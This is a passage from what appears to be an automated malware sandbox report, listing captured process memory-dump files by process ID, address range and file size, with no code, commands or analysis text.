                        • memory/4104-321-0x0000000071BB0000-0x000000007229E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4104-328-0x0000000008070000-0x0000000008071000-memory.dmp
                          Filesize

                          4KB

                        • memory/4104-360-0x0000000009470000-0x0000000009471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4104-352-0x00000000097D0000-0x0000000009803000-memory.dmp
                          Filesize

                          204KB

                        • memory/4104-340-0x00000000089E0000-0x00000000089E1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4108-162-0x0000000000417A8B-mapping.dmp
                        • memory/4108-164-0x0000000000400000-0x0000000000439000-memory.dmp
                          Filesize

                          228KB

                        • memory/4188-282-0x0000000000000000-mapping.dmp
                        • memory/4188-295-0x0000000000930000-0x0000000000931000-memory.dmp
                          Filesize

                          4KB

                        • memory/4188-287-0x00000000000C0000-0x00000000000C1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4188-286-0x0000000071BB0000-0x000000007229E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4188-303-0x000000000A5D0000-0x000000000A5D5000-memory.dmp
                          Filesize

                          20KB

                        • memory/4188-300-0x0000000004A20000-0x0000000004A32000-memory.dmp
                          Filesize

                          72KB

                        • memory/4200-118-0x0000000000000000-mapping.dmp
                        • memory/4204-279-0x0000000000000000-mapping.dmp
                        • memory/4256-121-0x0000000000000000-mapping.dmp
                        • memory/4296-236-0x0000000000417A8B-mapping.dmp
                        • memory/4296-235-0x0000000000400000-0x0000000000434000-memory.dmp
                          Filesize

                          208KB

                        • memory/4296-238-0x0000000000400000-0x0000000000434000-memory.dmp
                          Filesize

                          208KB

                        • memory/4300-212-0x000000000043FCC3-mapping.dmp
                        • memory/4300-211-0x0000000000400000-0x0000000000493000-memory.dmp
                          Filesize

                          588KB

                        • memory/4300-214-0x0000000000400000-0x0000000000493000-memory.dmp
                          Filesize

                          588KB

                        • memory/4304-346-0x0000000000000000-mapping.dmp
                        • memory/4304-348-0x0000000071BB0000-0x000000007229E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4324-130-0x000000000043FCC3-mapping.dmp
                        • memory/4324-128-0x0000000000400000-0x0000000000498000-memory.dmp
                          Filesize

                          608KB

                        • memory/4324-135-0x0000000000400000-0x0000000000498000-memory.dmp
                          Filesize

                          608KB

                        • memory/4360-131-0x0000000000417A8B-mapping.dmp
                        • memory/4360-134-0x0000000000400000-0x0000000000439000-memory.dmp
                          Filesize

                          228KB

                        • memory/4360-129-0x0000000000400000-0x0000000000439000-memory.dmp
                          Filesize

                          228KB

                        • memory/4364-342-0x00007FFBC6460000-0x00007FFBC6E4C000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/4364-339-0x0000000000000000-mapping.dmp
                        • memory/4364-344-0x0000023578850000-0x0000023578851000-memory.dmp
                          Filesize

                          4KB

                        • memory/4364-343-0x0000023578330000-0x0000023578331000-memory.dmp
                          Filesize

                          4KB

                        • memory/4376-58-0x0000000000000000-mapping.dmp
                        • memory/4380-227-0x0000000000000000-mapping.dmp
                        • memory/4416-297-0x0000000000000000-mapping.dmp
                        • memory/4460-64-0x0000000070420000-0x0000000070B0E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4460-63-0x0000000000000000-mapping.dmp
                        • memory/4564-67-0x0000000000000000-mapping.dmp
                        • memory/4568-268-0x0000000000400000-0x0000000000420000-memory.dmp
                          Filesize

                          128KB

                        • memory/4568-271-0x0000000000400000-0x0000000000420000-memory.dmp
                          Filesize

                          128KB

                        • memory/4568-269-0x000000000041A684-mapping.dmp
                        • memory/4664-69-0x0000000000000000-mapping.dmp
                        • memory/4664-74-0x0000000070420000-0x0000000070B0E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4680-138-0x0000000000400000-0x0000000000425000-memory.dmp
                          Filesize

                          148KB

                        • memory/4680-140-0x000000000041A684-mapping.dmp
                        • memory/4680-142-0x0000000000400000-0x0000000000425000-memory.dmp
                          Filesize

                          148KB

                        • memory/4688-220-0x0000000000000000-mapping.dmp
                        • memory/4716-315-0x0000000005310000-0x0000000005311000-memory.dmp
                          Filesize

                          4KB

                        • memory/4716-306-0x0000000000000000-mapping.dmp
                        • memory/4824-290-0x0000000000000000-mapping.dmp
                        • memory/4836-263-0x0000000000000000-mapping.dmp
                        • memory/4844-371-0x00007FFBC6460000-0x00007FFBC6E4C000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/4844-369-0x0000000000000000-mapping.dmp
                        • memory/4848-149-0x0000000000000000-mapping.dmp
                        • memory/4860-150-0x0000000000000000-mapping.dmp
                        • memory/4872-372-0x00007FFBC6460000-0x00007FFBC6E4C000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/4872-370-0x0000000000000000-mapping.dmp
                        • memory/4900-334-0x00007FFBC6460000-0x00007FFBC6E4C000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/4900-336-0x00000000009A0000-0x00000000009A1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4900-330-0x0000000000000000-mapping.dmp
                        • memory/4900-329-0x0000000000000000-mapping.dmp
                        • memory/4940-166-0x000000000041A684-mapping.dmp
                        • memory/4956-222-0x0000000000000000-mapping.dmp
                        • memory/5020-106-0x0000000070420000-0x0000000070B0E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/5020-107-0x0000000000010000-0x0000000000011000-memory.dmp
                          Filesize

                          4KB

                        • memory/5020-103-0x0000000000000000-mapping.dmp
                        • memory/5020-204-0x0000000004B20000-0x0000000004BD0000-memory.dmp
                          Filesize

                          704KB

                        • memory/5020-207-0x0000000005420000-0x0000000005421000-memory.dmp
                          Filesize

                          4KB

                        • memory/5020-209-0x00000000054C0000-0x00000000054CD000-memory.dmp
                          Filesize

                          52KB

                        • memory/5084-109-0x0000000000000000-mapping.dmp